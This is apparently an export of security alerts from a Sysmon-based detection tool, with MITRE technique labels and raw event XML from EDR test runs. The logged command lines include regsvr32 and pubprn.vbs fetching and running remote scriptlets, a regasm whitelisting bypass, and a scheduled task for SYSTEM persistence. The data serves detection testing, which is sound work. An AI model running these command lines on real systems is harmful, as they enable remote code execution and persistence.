<TimeCreated SystemTime=""2019-07-29T21:33:44.641177Z"">
</TimeCreated>
<EventRecordID>4931</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:44.622</Data>
<Data Name=""ProcessGuid"">747F3D96-6638-5D3F-0000-001067BA8900</Data>
<Data Name=""ProcessId"">4288</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6638-5D3F-0000-00103DA88900</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1557854258.250959,2019-05-14T21:17:38.250959+04:00,,Threat,Critical,"User (insecurebank\Administrator) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( alice.insecurebank.local and IP ( 10.59.4.20 ) to hostname ( DC1 ) , IP ( 10.59.4.11 ) and port ( 389 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-14T17:17:26.738627Z"">
</TimeCreated>
<EventRecordID>32009</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1580"" ThreadID=""3960"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>alice.insecurebank.local</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-14 17:17:24.660</Data>
<Data Name=""ProcessGuid"">ECAD0485-F2EC-5CDA-0000-0010F1631500</Data>
<Data Name=""ProcessId"">4092</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""User"">insecurebank\Administrator</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.59.4.20</Data>
<Data Name=""SourceHostname"">alice.insecurebank.local</Data>
<Data Name=""SourcePort"">49584</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">10.59.4.11</Data>
<Data Name=""DestinationHostname"">DC1</Data>
<Data Name=""DestinationPort"">389</Data>
<Data Name=""DestinationPortName"">ldap</Data>
</EventData>
</Event>",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1557854246.738627,2019-05-14T21:17:26.738627+04:00,,Threat,Critical,"User (insecurebank\Administrator) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( alice.insecurebank.local and IP ( 10.59.4.20 ) to hostname ( DC1 ) , IP ( 10.59.4.11 ) and port ( 389 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-14T17:17:26.440651Z"">
</TimeCreated>
<EventRecordID>32008</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1580"" ThreadID=""3960"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>alice.insecurebank.local</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-14 17:17:24.597</Data>
<Data Name=""ProcessGuid"">ECAD0485-F2EC-5CDA-0000-0010F1631500</Data>
<Data Name=""ProcessId"">4092</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""User"">insecurebank\Administrator</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.59.4.20</Data>
<Data Name=""SourceHostname"">alice.insecurebank.local</Data>
<Data Name=""SourcePort"">49583</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">10.59.4.11</Data>
<Data Name=""DestinationHostname"">DC1</Data>
<Data Name=""DestinationPort"">389</Data>
<Data Name=""DestinationPortName"">ldap</Data>
</EventData>
</Event>",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436024.287385,2019-07-30T01:33:44.287385+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:44.268287Z"">
</TimeCreated>
<EventRecordID>4929</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:44.204</Data>
<Data Name=""ProcessGuid"">747F3D96-6638-5D3F-0000-00103DA88900</Data>
<Data Name=""ProcessId"">1652</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436024.287385,2019-07-30T01:33:44.287385+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:44.268287Z"">
</TimeCreated>
<EventRecordID>4929</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:44.204</Data>
<Data Name=""ProcessGuid"">747F3D96-6638-5D3F-0000-00103DA88900</Data>
<Data Name=""ProcessId"">1652</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1587853142.072006,2020-04-26T02:19:02.072006+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-04-25T22:19:02.057201Z"">
</TimeCreated>
<EventRecordID>27334</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2752"" ThreadID=""3576"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-04-25 22:19:01.724</Data>
<Data Name=""ProcessGuid"">747F3D96-B755-5EA4-0000-0010D06E2500</Data>
<Data Name=""ProcessId"">4484</Data>
<Data Name=""Image"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Host Process for Windows Services</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">svchost.exe</Data>
<Data Name=""CommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-3384-5EA5-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69</Data>
<Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
<Data Name=""ParentProcessId"">596</Data>
<Data Name=""ParentImage"">?</Data>
<Data Name=""ParentCommandLine"">?</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1138] Application Shimming - process,1553028513.459611,2019-03-20T00:48:33.459611+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T20:48:33.439582Z"">
</TimeCreated>
<EventRecordID>1966368</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 20:48:33.279</Data>
<Data Name=""ProcessGuid"">365ABB72-55A1-5C91-0000-0010AB8C0700</Data>
<Data Name=""ProcessId"">2112</Data>
<Data Name=""Image"">C:\Windows\System32\sdbinst.exe</Data>
<Data Name=""FileVersion"">6.0.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Compatibility Database Installer</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\sdbinst.exe&quot; -q &quot;C:\Windows\AppPatch\Test.SDB &quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\System32\</Data>
<Data Name=""User"">EXAMPLE\user01</Data>
<Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
<Data Name=""LogonId"">0x33435</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F</Data>
<Data Name=""ParentProcessGuid"">365ABB72-551C-5C91-0000-001030590500</Data>
<Data Name=""ParentProcessId"">2704</Data>
<Data Name=""ParentImage"">C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe&quot; </Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436019.372599,2019-07-30T01:33:39.372599+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:39.358048Z"">
</TimeCreated>
<EventRecordID>4926</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:39.223</Data>
<Data Name=""ProcessGuid"">747F3D96-6633-5D3F-0000-001092628900</Data>
<Data Name=""ProcessId"">5056</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436019.358048,2019-07-30T01:33:39.358048+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:39.312305Z"">
</TimeCreated>
<EventRecordID>4925</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:39.152</Data>
<Data Name=""ProcessGuid"">747F3D96-6633-5D3F-0000-001051608900</Data>
<Data Name=""ProcessId"">4092</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436085.311645,2019-07-30T01:34:45.311645+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:45.242404Z"">
</TimeCreated>
<EventRecordID>5004</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:45.198</Data>
<Data Name=""ProcessGuid"">747F3D96-6675-5D3F-0000-0010AA498F00</Data>
<Data Name=""ProcessId"">4184</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1564436081.793311,2019-07-30T01:34:41.793311+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( schtasks /create /tn &quot;mysc&quot; /tr C:\windows\system32\calc.exe /sc ONLOGON /ru &quot;System&quot; /f ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:40.889027Z"">
</TimeCreated>
<EventRecordID>5002</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">Persistence - Scheduled Task Management</Data>
<Data Name=""UtcTime"">2019-07-29 21:34:40.755</Data>
<Data Name=""ProcessGuid"">747F3D96-6670-5D3F-0000-0010F9148F00</Data>
<Data Name=""ProcessId"">7076</Data>
<Data Name=""Image"">C:\Windows\System32\schtasks.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Task Scheduler Configuration Tool</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">schtasks /create /tn &quot;mysc&quot; /tr C:\windows\system32\calc.exe /sc ONLOGON /ru &quot;System&quot; /f</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6670-5D3F-0000-001099048F00</Data>
<Data Name=""ParentProcessId"">2916</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c schtasks /create /tn &quot;mysc&quot; /tr C:\windows\system32\calc.exe /sc ONLOGON /ru &quot;System&quot; /f</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
